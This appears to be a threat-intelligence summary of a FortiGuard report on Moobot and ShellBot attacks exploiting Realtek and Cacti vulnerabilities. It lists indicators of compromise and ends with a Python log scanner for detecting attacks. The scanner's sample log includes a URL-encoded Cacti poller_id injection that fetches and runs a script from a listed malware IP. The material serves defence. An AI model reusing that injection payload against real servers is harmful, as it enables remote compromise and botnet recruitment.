Moobot Strikes Again – Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs

FortiGuard Labs tracked bursts of attacks in January and March exploiting Realtek CVE-2021-35394 and Cacti CVE-2022-46169, spreading ShellBot and Moobot malware. Moobot (a Mirai variant) can be controlled via a C2 server to conduct further attacks such as DDoS, while ShellBot uses Perl/IRC for command and control. #Moobot #ShellBot #CVE-2021-35394 #CVE-2022-46169 #Realtek #Cacti

Keypoints

  • FortiGuard Labs observed bursts targeting Realtek and Cacti vulnerabilities in Jan and Mar, leading to ShellBot and Moobot deployments.
  • Moobot is a Mirai variant that can control compromised devices via a C2 server and launch DDoS attacks.
  • ShellBot is a Perl IRC-based botnet with multiple variants and C2 configurations described in the article.
  • The Realtek vulnerability CVE-2021-35394 enables arbitrary command execution on UDPServer, enabling payload delivery.
  • The Cacti vulnerability CVE-2022-46169 allows unauthenticated code execution via remote_agent.php, enabling Moobot/ShellBot payloads.
  • Fortinet protections include FortiGuard Antivirus detections, IPS signatures, web filtering, and IP reputation to mitigate these threats.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The Realtek and Cacti vulnerabilities are used to execute commands on exposed devices. ‘CVE-2021-35394 is an arbitrary command injection vulnerability that affects UDPServer due to insufficient legality detection on commands received from clients.’
  • [T1105] Ingress Tool Transfer – The malware payload is downloaded after initial access. ‘The script file to further download Moobot is shown below. It executes the Moobot with the parameter realtek.’
  • [T1059] Command and Scripting Interpreter – ShellBot, also known as PerlBot, is written in Perl and uses the Internet Relay Chat (IRC) protocol to communicate with its C2 server.
  • [T1071] Application Layer Protocol – The malware establishes C2 with the server; ‘Once executed, it prints “listening to tun0” to the console and then starts communicating with the C2 host “troon[.]dns[.]army” with the heartbeat message “0x336699”.’

Indicators of Compromise

  • [IP Address] Malware hosts – 104.244.76.105, 156.224.24.249, and 6 more IPs
  • [Domain] C2 servers – troon.dns.army, juice.baselinux.net, and 6 more domains
  • [File Hash] Moobot payload hashes – 455314a186b4a9a1788e2acb85a9b6b34fb0a7700d0decc6de056030fea543df, 0d4be7af347f2cb80dcd71cd94f1f39a6f3dbe71765d824bb0d66c11b8759cd7
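The following Python is an added example, not code from the FortiGuard post. It ties the Cacti keypoint above to the IoC list: it scans web-server access logs (Apache/nginx combined format) for requests to remote_agent.php whose poller_id parameter carries shell metacharacters, which is how CVE-2022-46169 is exploited (that poller_id is the injected parameter comes from the public CVE advisory, not from this page), and it flags any of the page's listed IoCs that appear in a request or in other log text. The log lines are constructed, the function names are mine, and only the IoCs the page spells out are included; the "and N more" entries are not reproduced.

```python
"""Detect CVE-2022-46169 exploitation attempts against Cacti and match page IoCs.

Added example for this summary page; not FortiGuard's code. Sample log lines are
constructed for illustration (203.0.113.7 is a TEST-NET address).
"""
import re
from urllib.parse import urlsplit, unquote_plus

# IoCs copied from the page; the "and N more" entries are not listed there.
IOC_IPS = {"104.244.76.105", "156.224.24.249"}
IOC_DOMAINS = {"troon.dns.army", "juice.baselinux.net"}
IOC_HASHES = {
    "455314a186b4a9a1788e2acb85a9b6b34fb0a7700d0decc6de056030fea543df",
    "0d4be7af347f2cb80dcd71cd94f1f39a6f3dbe71765d824bb0d66c11b8759cd7",
}

# Apache/nginx combined log format: src ident user [time] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that separate commands or substitute text when a value reaches /bin/sh.
SHELL_META = re.compile(r"[;|&`$\n]|\$\(")


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode each value.

    urllib's parse_qs is avoided on purpose: older versions also split on ';',
    which would hide the very separator the injection relies on.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def iocs_in(text):
    """Return the page's IoCs (IPs, domains, hashes) that occur in `text`."""
    text = text.lower()
    return sorted(i for i in IOC_IPS | IOC_DOMAINS | IOC_HASHES if i in text)


def check_request(line):
    """Return a list of findings for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("path"))
    if not url.path.endswith("/remote_agent.php"):
        return []
    findings = []
    for value in parse_query(url.query).get("poller_id", []):
        if SHELL_META.search(value):
            findings.append("shell metacharacters in poller_id")
        elif not value.isdigit():  # a legitimate poller_id is a small integer
            findings.append("non-numeric poller_id")
        for ioc in iocs_in(value):
            findings.append(f"known IoC {ioc} in request")
    return findings


def scan(lines):
    """Return [(source_ip, findings)] for every line that produced a finding."""
    results = []
    for line in lines:
        findings = check_request(line)
        if findings:
            results.append((LOG_RE.match(line).group("src"), findings))
    return results


# Constructed sample: a normal poller request, an injection attempt that pulls a
# script from one of the listed IoC IPs, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2023:12:00:01 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&poller_id=1&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2023:12:00:09 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&poller_id=1%3Bcurl+http%3A%2F%2F104.244.76.105%2Fx.sh%7Csh'
    '&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 0',
    '203.0.113.7 - - [10/Mar/2023:12:00:10 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, findings in scan(SAMPLE_LOG):
        print(src, findings)
```

Run it against real logs by replacing SAMPLE_LOG with the file contents; a single finding is worth triage on its own, because legitimate pollers never send anything but a numeric poller_id. The IoC match is substring-based and deliberately simple, so expect it to fire on decoded payloads and DNS query logs alike.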

Read more: https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities